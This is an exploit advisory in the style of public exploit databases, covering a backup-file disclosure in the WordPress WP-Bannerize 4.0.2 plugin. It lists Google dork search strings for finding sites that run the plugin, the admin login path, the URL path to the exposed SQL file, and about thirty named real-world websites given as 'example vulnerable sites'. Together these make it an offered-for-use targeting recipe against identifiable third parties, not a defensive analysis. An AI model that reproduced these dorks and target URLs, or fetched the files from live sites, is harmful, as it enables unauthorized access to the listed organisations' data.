#################################################################################################
# Exploit Title : WordPress WP-Bannerize Plugins 4.0.2 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : undolog.com ~ wordpress.org/plugins/wp-bannerize/
# Software Download Link : downloads.wordpress.org/plugin/wp-bannerize.4.0.2.zip
+ github.com/jwachira/tablog/archive/master.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0.2
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-bannerize/Classes/''
intext:''© COPYRIGHT 2018. POWERED BY WORDPRESS HOARDER THEME BY THEMEZILLA''
intext:''Powered by WP 3.2.1 & Xanthos designed by Fab Themes.''
intext:''Powered by agenciaspasso.com.br''
intext:''© 2017 - Desenvolvido por Webmundo Soluções Interativas''
intext:''Developed by Paolo Romano. Copyright by BCE SRL.''
intext:''Desenvolvido por E-gnição.''
intext:''Zadarweb Studio''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] mantena.mg.gov.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] rwmf.net/v2/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] lszd.hr/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] dfbrcko.ba/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] jazzin.rs/eng/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ilmediano.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] agitaeco.com.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] kraljeva-sutjeska.com/portal/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] decryptageo.fr/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ggu.gr/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ozorkow.info.pl/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] feiracultural.art.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] tourdemarienvelde.nl/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] dobranovica.si/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] maxwoman.ua/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] bce.it/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] caia.ro/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] fedfach.cl/site_news/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] mundocritico.es/revista/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] tepe.com.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] rdmonline.com.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] assoleste.org.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] theartsshelf.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] fakt.kg/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ceciliato.com.br/site/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] dfbrcko.ba/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ilmediano.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] agitaeco.com.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] alb365.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] thecherryblossomgirl.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] vortexhost.com.br/sites/fucapi/_____dsftrsfucapiblog/wp-content/plugins/
wp-bannerize/Classes/wpBannerizeTable.sql
[+] iict.ac.ir/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################